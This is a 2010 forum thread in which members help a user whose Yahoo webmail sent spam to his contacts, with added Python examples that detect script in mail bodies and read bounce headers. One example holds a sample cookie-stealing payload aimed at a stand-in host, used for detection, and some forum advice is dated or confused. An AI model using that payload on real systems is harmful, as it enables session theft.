Bare Knuckle Pickups Forum
At The Back => Time Out => Topic started by: MDV on May 06, 2010, 03:45:35 PM
-
So, something has caused my email to send a link out to my address book (more or less all of it at least). Likely a virus it seems.
The email doesn't show in my sent folder, and there's a delivery failure notice to 3 presumably dead emails (one of which is swineshead :() at about half 11 today.
Now, my lack of concern for the size or functionality of male genitalia aside (which apparently is what the link was to, I haven't clicked it), does this pose a threat to other logins (like online banking and PayPal?)
I've run an antivirus (Kaspersky), which comes up with the same things as last time, which I thought it had dealt with - two legal keyloggers, one for a game (for some $%&#ing reason) and a trojan, all over 2 weeks old. It doesn't show them as active threats, nor does it show them as disinfected or quarantined. This confuses me. It gives me the option to quarantine them, but just opens my documents folder when I click on it.
Seems either a trojan or a keylogger could do this, but the virus report is quite confusing, plus that these are old and the email hijack was today.
No erroneous payments from my account or PayPal. Passwords changed using a virtual keyboard that comes with Kaspersky (in case it's a keylogger).
Apologies to forum members that received a bizarre email from me!
Anybody know anything that can help me determine if my computer is infected and/or other logons at risk, or is it just isolated to my email?
Thanks in advance. Best price on Russian-sourced male performance enhancement pills to anyone that can help!
Edit - to clarify, virus scans taken today show a 100% clean computer.
-
You are not alone - I regularly get emails from Johnny Mac just like it, and my girlfriend's AOL account suffered the same hijack.
I would be interested in knowing more about it and what can be done
-
There's a lot of it about.
I have a friend who sent an "I apologise for the funny e-mail" just the other week...
(I didn't get a funny e-mail though!!)
I was talking to his missus last night (actually, she's the friend, she was my best-woman when I got married, he's her other-half)... er, where was I? Oh yeah...
HE (this chap/friend/spouse-of-friend)(his name's Steve, if that helps) is an IT personage, and he's still fighting it... his investigations so far have revealed that it has something to do with facebook...
But, like all IT professionals, he does tend to blame the most obvious "someone else" when things go wrong... (I am an IT professional, of sorts, myself :lol:)
His missus, last night, was saying "He's convinced it's something in his facebook account..." in her very best "the stupid pillock" tone of voice... (she was "Business IT" herself before sprouting sprogs).
BUT - I have a feeling you're anti-facebook like I am MDV?? (so you haven't got an account, and it wouldn't be the issue here).
I think it's "e-mail accounts only" at risk - the idea of beasts like this is to get legit e-mail addresses to send out your bullsh1t for you, bypassing spam-filters.
But... who knows? I'll also be interested in anything else people have got ...
-
I am indeed anti-Facebook, and don't have an account, or MySpace or Twitter - the only things that have my account login in them are forums, Amazon and a small number of big and as-trustworthy-as-one-can-hope-for suppliers (Strings Direct, StewMac, Allparts, that sort of thing), PayPal and the bank. Nothing that I'd think would be suspect.
I've also used this email address for about 5 years without any trouble.
Currently running a max-invasive paranoid security level scan with Kaspersky.
-
I'm slightly suspicious of Amazon anyway out of those (mainly cos it runs like a filthy dog on my laptop and I can see various adware things getting blocked every time I open an Amazon window) - but I'm not sure I'd be that suspicious of any of them... (unless of course you were using one of them on the day that it experienced an attack).
Have you got anything that you allow to use you as a "server"?
Eg. When I joined Spotify (and whenever it updates its client on my pc), my firewall goes "Spotify wants you to act as a server" and I go - "You can f**k right off on that mate..." (well, the button actually says "No", but I've explained to my missus that it's a little more forceful/important than just "No"...)
The first time I thought "oh well, that's it, no spotify for me then", but it works even if you deny this.
It's that sort of thing that I'd suspect, or something that manages to sneak in and pretend it's something else so that your firewall doesn't notice when it starts calling home...
Hopefully if there's anything like that lurking then the scan will spot it.
But I've always assumed that to send e-mail from you, recognisable as coming from you and your ip address... that, unless it's installed some crazy program on your system, a process elsewhere has to take control of your machine and use your e-mail client to send from your e-mail address book... (the fact that you've got nothing in your sent folder made me wonder, but I'm not sure it's that indicative of owt...)
Can you tell from the returned mails whether it was actually coming from your ip? ie from all the tracking guff you get in returned mails. I don't really know how to read them, but I'd be tempted to send a "Testing Testing" e-mail to one of those dead addresses to see whether the return of a legit e-mail from me looks the same as one of these spam-jobs.
-
You are not alone - I regularly get emails from Johnny Mac just like it, and my girlfriend's AOL account suffered the same hijack.
I would be interested in knowing more about it and what can be done
Yeah, I get bogus "John Mac" emails as well! Very odd.
-
Hard to say if it's isolated to your email or not; viruses can do really nasty things to hide in your system, if you have a single specific target, and it's not that hard to make something undetectable if you've got the resources. Then it's just a case of getting it inside the target.
In the case of preventing viruses everyone should have a firewall, antivirus, Windows/Mac/Linux up to date, and web browsers, Flash, PDF reader and Java up to date too.
Highly recommend Secunia PSI, it's a program that checks what needs patching; Microsoft Security Essentials if you want a free easy-to-use antivirus; if you ain't got a firewall in your OS then there is a free version of ZoneAlarm.
For a bit of security through obscurity I'd change Adobe Reader for Foxit Reader or PDF-XChange Viewer, and also change Internet Explorer for Google Chrome. I use Firefox but its market share has gone up, yet I can't live without my addons; a good addon for Firefox is NoScript but it's complex and fiddly, especially when it's a fresh install.
As for Facebook, I'm on it, privacy settings at the maximum, and I absolutely refuse to use any of the third-party applications on there. Way too easy for anyone to add an application of dodgy code.
With passwords I use a mix of upper and lower case characters with numbers and symbols, and have different ones for my email and bank
-
Funny you mention Chrome - I was using it for about 1 week as my main browser since Firefox started having trouble displaying some stuff (pics, Flash player vid, menus, all sorts). Never, not once, had a problem with FF.
Rather reminds me of the time I changed to Opera for a week, about 4 years ago, and got about 10 viruses.
Uninstalled Chrome and did all the other changes in FF, in case it had anything to do with it. Haven't used IE in ages.
Thanks for the other advice, I'll look into it (not being totally green on PC security, I have antivirus, firewall (which I now find is off, for no good reason whatsoever! But Kaspersky's has been on) and don't generally do anything dumb or gullible. It's all very odd.
-
ON Facebook - avoid ALL 3rd party applications - they are a minefield at best
-
Kaspersky DEFCON-level kill-everything-in-sight scan came up blank.
Started windows defender scan.
-
Do you use System Restore to keep snapshots of known good states of Windows? I'm not up to speed on Windows admin these days as I've actively avoided it since 2002 for these very reasons.
-
You are not alone - I regularly get emails from Johnny Mac just like it, and my girlfriend's AOL account suffered the same hijack.
I would be interested in knowing more about it and what can be done
Yeah, I get bogus "John Mac" emails as well! Very odd.
Sorry about these Jonathan, Philly. I have tried to stop them. It hacked my Hotmail account and I know others who have had the same problem. All Chinese-based 'companies'.
I think the one I've got just operates from my Hotmail account, if that's possible. I've had it go out when using Hotmail on my Mac and that's only 8 days old.
-
You are not alone - I regularly get emails from Johnny Mac just like it, and my girlfriend's AOL account suffered the same hijack.
I would be interested in knowing more about it and what can be done
Yeah, I get bogus "John Mac" emails as well! Very odd.
You must be sh1ting me.... SO DO I! :o
They turn up about twice a month.
That's what we get for being intimate with Johnny Mac and playing with his Koch... "Forum Clap" :(
-
You are not alone - I regularly get emails from Johnny Mac just like it, and my girlfriend's AOL account suffered the same hijack.
I would be interested in knowing more about it and what can be done
Yeah, I get bogus "John Mac" emails as well! Very odd.
Sorry about these Jonathan, Philly. I have tried to stop them. It hacked my Hotmail account and I know others who have had the same problem. All Chinese-based 'companies'.
Not a problem, Johnny. I hope to find a use for the cheap Viagra, one day.
-
You are not alone - I regularly get emails from Johnny Mac just like it, and my girlfriend's AOL account suffered the same hijack.
I would be interested in knowing more about it and what can be done
Yeah, I get bogus "John Mac" emails as well! Very odd.
You must be sh1ting me.... SO DO I! :o
They turn up about twice a month.
That's what we get for being intimate with Johnny Mac and playing with his Koch... "Forum Clap" :(
It's a small price to pay for such a massive Koch!
-
Maybe we should take a leaf out of Dave Gorman's book, and just say "yes!" to all the spam... Larger manhoods, better erections, free money from a bloke in Nigeria...
What can possibly go wrong???
-
Maybe we should take a leaf out of Dave Gorman's book, and just say "yes!" to all the spam... Larger manhoods, better erections, free money from a bloke in Nigeria...
What can possibly go wrong???
Alas !
I ended up with a 'Manhood' so tumescent, that I could no longer get close enough to the sink and shave. I lost all my mates through looking unkempt - and the bloke from Nigeria never turned up anyway.
I even recently got 'Spam' from B.K.P. offering a range of '7 String pickup covers' - and 550K Pots; I mean, come on - that's not even Standard ... :mrgreen:
-
Glad I didn't click that link, then! :lol:
It did seem to be most of your inbox, yeah (at least I assume that's most of your inbox... it was to several people).
I have Kaspersky too, but you know as much as I do about using it, it always confuses me as well... :(
Have you tried contacting MSN/Hotmail? I think there's quite a lot of it around, a dude on another forum had a similar thing happen and he sent me a similar email.
If my email starts acting crazy ever, please let me know!
-
Well, I've spoken with my #1 tech advisor dude and he reckons it's a rootkit.
I've changed passwords on all my important (i.e. financial) stuff on a different PC (well, laptop) and am using that now with the infected PC disconnected from the net and my network.
Will probably need to wipe the HD to get rid of it....sending out emails is one thing, but rootkits are capable of much more and damned near impossible to remove.
On the plus side, the potential for stuff like this is why I kept my old PC - to protect my audio PC, which is a working machine and not for $%ing about with or getting clogged up or infected. That (and this LT) haven't been switched on in the problem time, so it should be fine. I hope.
-
Glad I didn't click that link, then! :lol:
It did seem to be most of your inbox, yeah (at least I assume that's most of your inbox... it was to several people).
I have Kaspersky too, but you know as much as I do about using it, it always confuses me as well... :(
Have you tried contacting MSN/Hotmail? I think there's quite a lot of it around, a dude on another forum had a similar thing happen and he sent me a similar email.
If my email starts acting crazy ever, please let me know!
I suppose there's some solace in it being so common. Mum was quite confused as to why I'd sent her a link to a Viagra site, but said she got the same one from an ex-guitarist too.
Hopefully it's just an irritation - it hijacks your email and sends this link to as many people as possible, cascading through address books, looking (a little) more trustworthy because it's from someone you know, and doesn't try and do anything worse than that. Certain my bank account and PayPal have shown no change through the day, and the computer is otherwise behaving normally.
-
One other thing to question, is your email client a piece of software on your machine (Thunderbird etc.) or do you use an online email service like Hotmail? If it's the latter you're at risk from Javascript exploits. I think all the major webmail services (Gmail, Hotmail and Yahoo!) all rely on Javascript to do their thing and Javascript is notoriously hackable. Often you don't even have to click on a link in a maliciously crafted mail, the mere fact of it hitting your account and looking at it can be enough to execute code which is generally the thieving of your address book and subsequent spam. Unfortunately if you rely on webmail there's not much you can do - you have to allow Javascript to get the website to work and Javascript is very bad from a security stand point.
-
It's Yahoo, and I'm aware of some of the problems with Java (it's the only thing that comes up in Kaspersky vulnerability scans, at least!), but didn't know it made email hacking that easy.
In your estimation then, do I have malware on that machine (Malwarebytes free version now also says it's clean, btw) or has some tw@t hacked my address, but my PC and other info are fine?
-
Oh, and will do, Dave.
This is a pain; at least if some scan could point at something and go 'there it is!' I'd know there was a problem on my machine, with complete certainty - as it is I'm tempted to go with the password changes, the tightening of security on that machine and carry on like it's fine, which might well be the worst thing I can do.
-
One other thing to question, is your email client a piece of software on your machine (Thunderbird etc.) or do you use an online email service like Hotmail? If it's the latter you're at risk from Javascript exploits. I think all the major webmail services (Gmail, Hotmail and Yahoo!) all rely on Javascript to do their thing and Javascript is notoriously hackable. Often you don't even have to click on a link in a maliciously crafted mail, the mere fact of it hitting your account and looking at it can be enough to execute code which is generally the thieving of your address book and subsequent spam. Unfortunately if you rely on webmail there's not much you can do - you have to allow Javascript to get the website to work and Javascript is very bad from a security stand point.
This sounds like the culprit!
-
It's Yahoo, and I'm aware of some of the problems with Java (it's the only thing that comes up in Kaspersky vulnerability scans, at least!), but didn't know it made email hacking that easy.
In your estimation then, do I have malware on that machine (Malwarebytes free version now also says it's clean, btw) or has some tw@t hacked my address, but my PC and other info are fine?
Java and Javascript are completely different languages. While the syntax may look the same, they work in entirely different ways.
-
It's Yahoo, and I'm aware of some of the problems with Java (it's the only thing that comes up in Kaspersky vulnerability scans, at least!), but didn't know it made email hacking that easy.
In your estimation then, do I have malware on that machine (Malwarebytes free version now also says it's clean, btw) or has some tw@t hacked my address, but my PC and other info are fine?
Java and Javascript are completely different languages. While the syntax may look the same, they work in entirely different ways.
Errrrr, ok, fine, but if you know the answer to the question, could you answer it, pretty please?
-
It's Java that is being exploited.
-
It's Java that is being exploited.
You sure? My machine itself and other logins under threat?
Password changed, all fixed?
-
Oh, I reinstalled java if that makes any difference.
-
I have my firewall set to warn me if anything is trying to play with Java on my PC...
I choose to block it and stop it dead and have not had an issue since.
And I hang out in some pretty seedy infected areas on this Big Ol' t'internet :?
-
Oh, I reinstalled java if that makes any difference.
If it is a Javascript exploit, changing passwords or doing reinstalls etc. won't make any difference and there's no reason why there would be any malicious code on your computer; it's in the email you were sent, which lives on your webmail provider's server and is executed by your machine when you see the mail.
Your best hope is that your webmail provider improves the security of the Javascript code that makes their site work. You could report your situation to them and it might help them debug their code and track down the vulnerability. Your passwords probably won't matter because these exploits work once you've already logged into your account. I'm afraid that this is a fact of life in this time where so many of us use webmail as our primary email client.
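The two posts above describe the class of bug they have in mind: a webmail front end that drops a sender-supplied HTML body into the page unescaped, so that script in the mail runs in the logged-in session and can read the address book. The thread gives no evidence of which bug (if any) Yahoo actually had, so the block below is an added illustration of the general class, written for this page and not taken from any post or provider. The mail body, the `/contacts` path and the `evil.example` host in it are constructed for the example; the finder flags the three places a renderer has to neutralise (script-like elements, `on*` event-handler attributes and `javascript:` URLs) and the two renderers show the unescaped and escaped versions side by side.

```python
from html import escape
from html.parser import HTMLParser

# Constructed sample of an HTML mail body carrying active content in the three
# places a webmail renderer has to worry about. Hostnames and paths are made up
# for the example; this is not a payload observed on any real provider.
CRAFTED_BODY = """<p>Hi, thought you might like this.</p>
<img src="x" onerror="new Image().src='//evil.example/?c='+document.cookie">
<a href="javascript:void(document.cookie)">click</a>
<script>document.title = 'pwned'</script>
"""

BENIGN_BODY = "<p>See you at the gig on <b>Friday</b>.</p>"


class ActiveContentFinder(HTMLParser):
    """Collects script-bearing elements, on* event-handler attributes and
    javascript: URLs found in an HTML fragment."""

    SCRIPT_TAGS = {"script", "iframe", "object", "embed"}
    URL_ATTRS = {"href", "src", "action", "formaction", "data"}

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # html.parser lower-cases tag names; attrs is a list of (name, value)
        if tag in self.SCRIPT_TAGS:
            self.findings.append(f"<{tag}> element")
        for name, value in attrs:
            name = name.lower()
            if name.startswith("on"):
                self.findings.append(f"{tag}@{name} event handler")
            elif name in self.URL_ATTRS and value:
                # collapse whitespace so "java script:" style padding is caught too
                scheme = "".join(value.split()).lower()
                if scheme.startswith("javascript:"):
                    self.findings.append(f"{tag}@{name} javascript: URL")


def find_active_content(html_body):
    """Return a list of human-readable findings; empty means nothing flagged."""
    finder = ActiveContentFinder()
    finder.feed(html_body)
    finder.close()
    return finder.findings


def render_unsafe(body):
    """What a naive webmail view does: trust the sender's markup verbatim."""
    return f'<div class="message">{body}</div>'


def render_safe(body):
    """Escape the body so the browser displays the markup instead of running it.
    (A real client that wants to show rich HTML would instead sanitise against
    an allow-list; escaping is the simplest correct baseline.)"""
    return f'<div class="message">{escape(body)}</div>'


if __name__ == "__main__":
    for label, body in (("crafted", CRAFTED_BODY), ("benign", BENIGN_BODY)):
        print(label, "raw:", find_active_content(render_unsafe(body)))
        print(label, "escaped:", find_active_content(render_safe(body)))
```

The finder is a triage aid, not a sanitiser: it tells you whether a body contains the kind of content the posts are worried about, and the `render_safe` path shows that once the body is escaped the same finder sees nothing, because the browser will see text rather than tags.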
-
I see
Thing is, I didn't open any emails that I didn't expect or weren't from trusted sources (no unusual content in those).
The closest I've come is looking at my spam folder, which I don't normally do, but I didn't open any, or don't remember it.
Maybe my memory's playing tricks on me, but I'm 99% sure that there were replies to this spam sent on my account the first time I opened my email today. Does that add up with the Java exploit?
-
I see
Thing is, I didn't open any emails that I didn't expect or weren't from trusted sources (no unusual content in those).
The closest I've come is looking at my spam folder, which I don't normally do, but I didn't open any, or don't remember it.
Maybe my memory's playing tricks on me, but I'm 99% sure that there were replies to this spam sent on my account the first time I opened my email today. Does that add up with the Java exploit?
Could well be. I'm pretty sure that when it happened to me I hadn't clicked on anything either. New vulnerabilities are discovered and exploited all the time. It's a shifting and increasingly sophisticated arms race between hackers and spam merchants and the webmail companies. We're just stuck in the middle.
-
One thing which hasn't been mentioned is that the emails are most likely not originating from your PC. Your address and address book have probably been harvested and emails are being generated elsewhere by a spambot faking you as the sender. There isn't a lot you can do about this.
If your IT friend thinks you have a rootkit has he suggested a way to find out? I would scan with http://www.f-secure.com/en_EMEA/security/tools/blacklight/
Rootkits for Win7 are currently rare at the moment, however if you're on XP there are thousands of the buggers!
From an IT security standpoint, if you have a rootkit then I would recommend a format of your system. It's the biggest pain in the arse for sure. BUT you don't know what else the rootkit has dumped on your system, some of which could be very new and not known to AV companies yet*
Of course this standpoint is fine for me as I can just network-boot a system and have it built in less than 1 hour. Not so easy for a home user who has to dedicate a lot of time getting a system back up and running.
*We send disk images of rootkit infected systems (It's rare we get them TBH) to McAfee our corporate AV vendor for analysis and it's very surprising how much new code they find on these infected systems, hence our don't clean-Re-format policy here!
-
Thanks guys.
There *seems* to be a second email, sent today, as I have a failure notice to several emails, and it's the same email, same dodgy link.
Guys on here that got the first one; can you give me a shout if you got a second one please?
See, if there was a second one, the PC that I was using and is suspected infected has been both disconnected (the cable pulled; it's a damned clever virus that can circumvent that) and the PC off (even cleverer!!!), and I've been on my laptop. The only connection is they run through the same router. So if there's a second email, the problem isn't my PC (or it's, somehow, all my PCs, but it would have to be stored on my router, since I haven't used my LT in weeks and disconnected the offending PC before firing it up, just in case).
So, anyone get a second spam email off me?
-
Oh, and will do, Dave.
Cheers! Hope you get it sorted :)
EDIT: no second one for me.
I also make a point of not even opening an email if I don't know who it's from.
-
It's Yahoo, and I'm aware of some of the problems with Java (it's the only thing that comes up in Kaspersky vulnerability scans, at least!), but didn't know it made email hacking that easy.
In your estimation then, do I have malware on that machine (Malwarebytes free version now also says it's clean, btw) or has some tw@t hacked my address, but my PC and other info are fine?
Java and Javascript are completely different languages. While the syntax may look the same, they work in entirely different ways.
Errrrr, ok, fine, but if you know the answer to the question, could you answer it, pretty please?
Just correcting your lack of knowledge is all. As a scientist I thought you would appreciate someone pointing out misconception, but apparently not. Ho hum.
As mentioned, this most likely happened when some Javascript was executed when you used your webmail client to view what was probably an utterly harmless-looking mail. I imagine it's harvested the content of your address book and/or the addresses in the sent mails.
Answer is, don't use a browser to view your mail. If you do, disable javascript. However I suspect that will cripple most of the functionality of the webmail service.
As for if you have a compromised system, who knows? If you're concerned it's probably easier to wipe and restore than it is to spend the hours and hours required to run all the software available, and even then you're not 100% positive that they've picked anything malicious up.
Happy now?
-
:lol: Happier, yeah :lol:
Sort of. I still don't know for sure if I have anything on my system, and don't know how to find out!
I am on Windows 7, btw. Also ran a Malwarebytes scan and it came up clean. Gonna try BlackLight and see what happens.
Let's not be making a big deal about the Java/Javascript thing. I accepted the correction, I just thought it was odd that that's what you chose to tell me.
-
Philp; BlackLight says that it's not compatible with Win 7. Trying to run it gives a 'you need admin privileges' message (which is a bit worrying in and of itself given what rootkits do).
Can anyone else that has 7 (preferably 64) try and run it and see if you get the same message please?
Edit - I get the same thing on my LT, which I at least think is clean and is 7-32
-
I'm slightly suspicious of Amazon anyway out of those (mainly cos it runs like a filthy dog on my laptop and I can see various adware things getting blocked every time I open an Amazon window) - but I'm not sure I'd be that suspicious of any of them... (unless of course you were using one of them on the day that it experienced an attack).
Have you got anything that you allow to use you as a "server"?
Eg. When I joined Spotify (and whenever it updates its client on my pc), my firewall goes "Spotify wants you to act as a server" and I go - "You can f**k right off on that mate..." (well, the button actually says "No", but I've explained to my missus that it's a little more forceful/important than just "No"...)
The first time I thought "oh well, that's it, no spotify for me then", but it works even if you deny this.
It's that sort of thing that I'd suspect, or something that manages to sneak in and pretend it's something else so that your firewall doesn't notice when it starts calling home...
Hopefully if there's anything like that lurking then the scan will spot it.
But I've always assumed that to send e-mail from you, recognisable as coming from you and your ip address... that, unless it's installed some crazy program on your system, a process elsewhere has to take control of your machine and use your e-mail client to send from your e-mail address book... (the fact that you've got nothing in your sent folder made me wonder, but I'm not sure it's that indicative of owt...)
Can you tell from the returned mails whether it was actually coming from your ip? ie from all the tracking guff you get in returned mails. I don't really know how to read them, but I'd be tempted to send a "Testing Testing" e-mail to one of those dead addresses to see whether the return of a legit e-mail from me looks the same as one of these spam-jobs.
Well, I sent an email to swineshead to get a failure notice that I know came from me with the corresponding IP.
It doesn't match the IP in the failure notice from the spam mails.
Can one of the learned IT dudes here please interpret this information for me in the "virus on my machine" vs "Yahoo server got hacked and my machine's fine" hypotheses?
Seems it didn't come from my computer, but rootkits are clever and might mask it, or use a proxy or something?
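The comparison MDV just did by eye (send a known-good mail to a dead address, compare the IP in that bounce with the IP in the spam's bounce) can be done from the `Received:` headers that a delivery-failure notice returns. The block below is an added example for this page, not anything posted in the thread or taken from Yahoo's systems. It assumes the webmail provider's outbound hosts live under a domain you know (`mail.example.net` stands in for it here) and that the bounce includes the undeliverable message's headers; both sample messages are constructed, using documentation address ranges, to stand for the "Testing Testing" mail and the spam respectively.

```python
import email
import re

# Constructed samples (documentation IP ranges, made-up hostnames), standing for
# the Received: lines you would pull out of two delivery-failure notices.

# 1) The "Testing Testing" mail, submitted from one's own browser (192.0.2.44 is
#    the assumed home connection) through the webmail provider's servers.
LEGIT = """\
Received: from mta3.mail.example.net (mta3.mail.example.net [203.0.113.7])
\tby mx.example.org with ESMTP id q46ABC123; Thu, 6 May 2010 12:02:10 +0100
Received: from web1.mail.example.net (web1.mail.example.net [203.0.113.21])
\tby mta3.mail.example.net with SMTP; Thu, 6 May 2010 12:02:09 +0100
Received: from [192.0.2.44] by web1.mail.example.net via HTTP; Thu, 6 May 2010 12:02:08 +0100
From: mdv@example.net
To: swineshead@example.org
Subject: Testing Testing

test
"""

# 2) The spam: handed straight to the recipient's MX by a host that never went
#    near the provider. Only the From: line is mdv's.
SPAM = """\
Received: from [198.51.100.9] (unknown [198.51.100.9])
\tby mx.example.org with ESMTP id q46DEF456; Thu, 6 May 2010 11:30:02 +0100
From: mdv@example.net
To: swineshead@example.org
Subject: have a look at this

have a look at this
"""

IP_RE = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")
FROM_RE = re.compile(r"^\s*from\s+(\S+)(?:\s+\(([^)]*)\))?", re.I)


def received_chain(raw_message):
    """All Received: headers, newest first: chain[0] was written by the last
    server to handle the mail (normally the recipient's own MX), chain[-1] by
    the first."""
    return email.message_from_string(raw_message).get_all("Received") or []


def handed_over_by(received_value):
    """(helo/hostname, reverse-DNS text, first IP) from one Received: header:
    who the server writing that header says it got the mail from."""
    m = FROM_RE.match(received_value)
    helo, rdns = (m.group(1), m.group(2) or "") if m else ("", "")
    ips = IP_RE.findall(received_value)
    return helo, rdns, (ips[0] if ips else None)


def analyse_bounce(raw_message, provider_domain, my_ip):
    """Decide whether the returned mail went through the provider, and if so
    from which client IP. Only chain[0] is written by a server the recipient
    controls; every header below it arrived with the message and can be forged,
    so "did it come through the provider" is judged at the top hop only."""
    chain = received_chain(raw_message)
    if not chain:
        return {"verdict": "no-received-headers"}
    helo, rdns, relay_ip = handed_over_by(chain[0])
    via_provider = helo.endswith(provider_domain) or provider_domain in rdns
    # The bottom header is the one a webmail front end adds when a browser
    # session submits a message; it records the browser's IP. It only means
    # something if the mail really did pass through the provider.
    _, _, client_ip = handed_over_by(chain[-1])
    if via_provider and client_ip == my_ip:
        verdict = "sent-through-provider-from-my-ip"
    elif via_provider:
        verdict = "sent-through-provider-from-another-ip"  # account used by someone else
    else:
        verdict = "never-went-through-provider"  # From: forged, address merely harvested
    return {"verdict": verdict, "relay_ip": relay_ip, "client_ip": client_ip, "hops": len(chain)}


if __name__ == "__main__":
    print("legit:", analyse_bounce(LEGIT, "mail.example.net", "192.0.2.44"))
    print("spam: ", analyse_bounce(SPAM, "mail.example.net", "192.0.2.44"))
```

The verdict names map onto the thread's two hypotheses: "never-went-through-provider" is the harvested-address-book case (nothing on the PC sends anything, and changing passwords does not stop it), while "sent-through-provider-from-another-ip" means someone used the account itself, which is the case where a password change and a look at the provider's login history matter. A bounce that returns only a generic failure text, without the original headers, gives the function nothing to work with.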
-
I'm not actually expert enough to interpret properly... but from this, and the posts on here since I wrote that, it does sound to me like your e-mail address and address book details got nicked and the funny mails are not coming from your machine...
So, if that's the case - I s'pose it's partly "good news"... it sounds like wipe and reformat might be receding as the solution...
But I'd still be left thinking the following:
a) "how the f did it happen?" (so I don't do that again) and
b) "is there any way I can stop these b@stards?".
I have a horrible feeling that there ain't any useful answers to those two questions :(
-
Philp; BlackLight says that it's not compatible with Win 7. Trying to run it gives a 'you need admin privileges' message (which is a bit worrying in and of itself given what rootkits do).
Can anyone else that has 7 (preferably 64) try and run it and see if you get the same message please?
Edit - I get the same thing on my LT, which I at least think is clean and is 7-32
On Win7, even when you are on as administrator you're not actually running with admin privs until you elevate your account (right click, Run as administrator!). If your 'compromised system' is Win7 x64 then I'm gonna stick my neck out and say the chances of you having a rootkit are pretty much zero! The Kernel Patch Protection in x64 makes it very hard to exploit any security holes!
You can use Sophos's free rootkit detector on Win7 64 if you really want http://www.sophos.com/products/free-tools/sophos-anti-rootkit.html
-
Aherm http://m.zdnet.com/blog/security/hacker-exploits-ie8-on-windows-7-to-win-pwn2own/5855
I didn't read it in depth but, as with any operating system running any software out there, there are going to be holes, no matter how secure they claim to be :(
-
Ok, here's the crack so far, summary and all the stuff I've done
- Spam email gets sent from my account to everyone in my address book. No saved email, failure notice IP doesn't match the IP from an email I send from my connection. Email is Yahoo.
- Run scans with
-
Stupid restarts. Summary again -
Scans with Kaspersky, Defender (Windows stock) and Malwarebytes. Clean.
Kaspersky shows a trojan on 18/4. It's the only infection it's recorded. It doesn't seem to still be there - I assume it handled it at the time.
AVG scan from my laptop across my network in case running from an OS that an infection isn't trying to hide from helps - no result.
Checked IPs in failed deliveries - they don't match emails sent from my connection.
SUPERAntiSpyware showed 9 tracking cookies, nothing major, all gone now.
Sophos showed 2 hidden things, don't know what they are, running again, will give more detail in a minute.
PC slowed down massively last night, to the point where the mouse wouldnt move for 5 seconds at a time. Turned off at the mains, working ok now, never done that before.
Called Yahoo, they said that this is happening a fair bit.
Changed all passwords on a different machine.
Set up a second email for financial things (also Yahoo though - can anyone suggest a more secure way?)
Thoughts? I know what it looks like to me, but I also don't know much about this stuff, when it gets down to it.
-
Sophos results
This $%er here
Area: Windows registry
Description: Hidden registry value
Location: \HKEY_USERS\S-1-5-18\Control Panel\International\sShortTime
Removable: No
Notes: (type 1, length 16) "h : m m t t "
And this
Area: Local hard drives
Description: Unknown hidden file
Location: C:\System Volume Information\SystemRestore\New-security.LOG1
Removable: Yes (but clean up not recommended for this file)
Notes: (no more detail available)
-
Sophos results
This $%&#er here
Area: Windows registry
Description: Hidden registry value
Location: \HKEY_USERS\S-1-5-18\Control Panel\International\sShortTime
Removable: No
Notes: (type 1, length 16) "h : m m t t "
And this
Area: Local hard drives
Description: Unknown hidden file
Location: C:\System Volume Information\SystemRestore\New-security.LOG1
Removable: Yes (but clean up not recommended for this file)
Notes: (no more detail available)
That's a fairly standard result for a clean system; you do not have a rootkit on your system!
-
Sophos results
This $%&#er here
Area: Windows registry
Description: Hidden registry value
Location: \HKEY_USERS\S-1-5-18\Control Panel\International\sShortTime
Removable: No
Notes: (type 1, length 16) "h : m m t t "
And this
Area: Local hard drives
Description: Unknown hidden file
Location: C:\System Volume Information\SystemRestore\New-security.LOG1
Removable: Yes (but clean up not recommended for this file)
Notes: (no more detail available)
That's a fairly standard result for a clean system; you do not have a rootkit on your system!
Kickass!
Don't mean to be a dick or anything, just checking source - I assume from your input in this thread that you're a pretty experienced IT dude?
-
Aherm http://m.zdnet.com/blog/security/hacker-exploits-ie8-on-windows-7-to-win-pwn2own/5855
I didn't read it in depth but, as with any operating system running any software out there, there are going to be holes, no matter how secure they claim to be :(
I never said it was impossible, I said it was highly unlikely, which I stick by. The hack in the ZDNet link is very very difficult to do and requires a direct attack from someone with extreme skill against a system. Bypassing DEP like he did would be almost impossible to automate.
Anyway the Sophos results say, as expected, MDV doesn't have a rootkit, so that's good news!
:D
-
Kickass!
Dont mean to be a dick or anything, just checking source - I assume from your input in this thread that youre a pretty experienced IT dude?
No problem at all, the internet is full of 'experts!' and anyone in IT who claims to know everything and can't be wrong is to be avoided at all costs! I can be wrong, but 20 years in IT tells me you don't have a rootkit; there would be a whole ream of hidden reg keys and dll's etc. if you did.
I would still try other antimalware products to 100% ensure a clean system; however, Malwarebytes is well regarded and this has given you a clean bill of health.
This is one part of my job; I also look after University-wide management and deployment systems.
http://www.northumbria.ac.uk/sd/academic/sobe/bevc/bevcpeople/paitman/
I usually try to avoid giving internet IT advice; it's far too easy to come to a conclusion without access to all of the facts. The user can tell you what they can and believe to be relevant, but there's no full picture of issues without actual access to the system, either real or via a remote session.
-
Sweet, exactly the experience and honesty (that you're not claiming to know for sure, just making the best call you can with the information you have) I hoped to see. Glad you're not offended, too :)
Thanks for your help!
Everyone else's too.
I think I'll hold off my Defcon Level 'Kill it with fire' plan of taking the hard drive out, burning it and putting in a spare I have sitting around!
-
Offended god no! I could have been a random 12 year old girl or 80 year old bloke ;)
I still stand by my comment that any emails people have received didn't originate from you but will have had your address as a faked sender; you will see non-delivery reports for bounces but no sent items. It's far too easy to fake the sender address or any other header. It doesn't even need any programming skills.
-
Which is indeed exactly what I saw. I'm not 100% (how could I be; I ain't no IT dude - I know just enough about computers to know how much I don't know) but I can come to reasonable, high confidence, if uncertain conclusions with limited evidence (that is my job) and we have
- dodgy email from my account
- delivery failure notice not from my IP
- no sent message log
- It's javascript (did I use it right this time sho' ;) :lol:) webmail
- I rang them and they're having some trouble with it happening on other accounts
- 3 anti-malware programs on the machine and one across a network coming up clean
- rootkit sniffer program giving clean result
- I have since explained the significant drop in performance experienced last night - it's a bit of software I've used for years that suddenly decided to make my machine die, so I killed it instead
All of the above are consistent with what you would expect of a commandeering of my account using another computer and nothing ever having been on my machine; many are not consistent with hidden malware (or at least it's highly unlikely, like Yahoo having more widespread problems with it and the failure notice IPs not being mine) - doesn't prove that nothing's there, but I'm quite satisfied that this computer is clean. (edit - Occam's razor = your friend; simple webmail hijack or nefarious malware-hiding rootkit that's evaded several fully updated and quite effective scans?)
Again, thanks :D
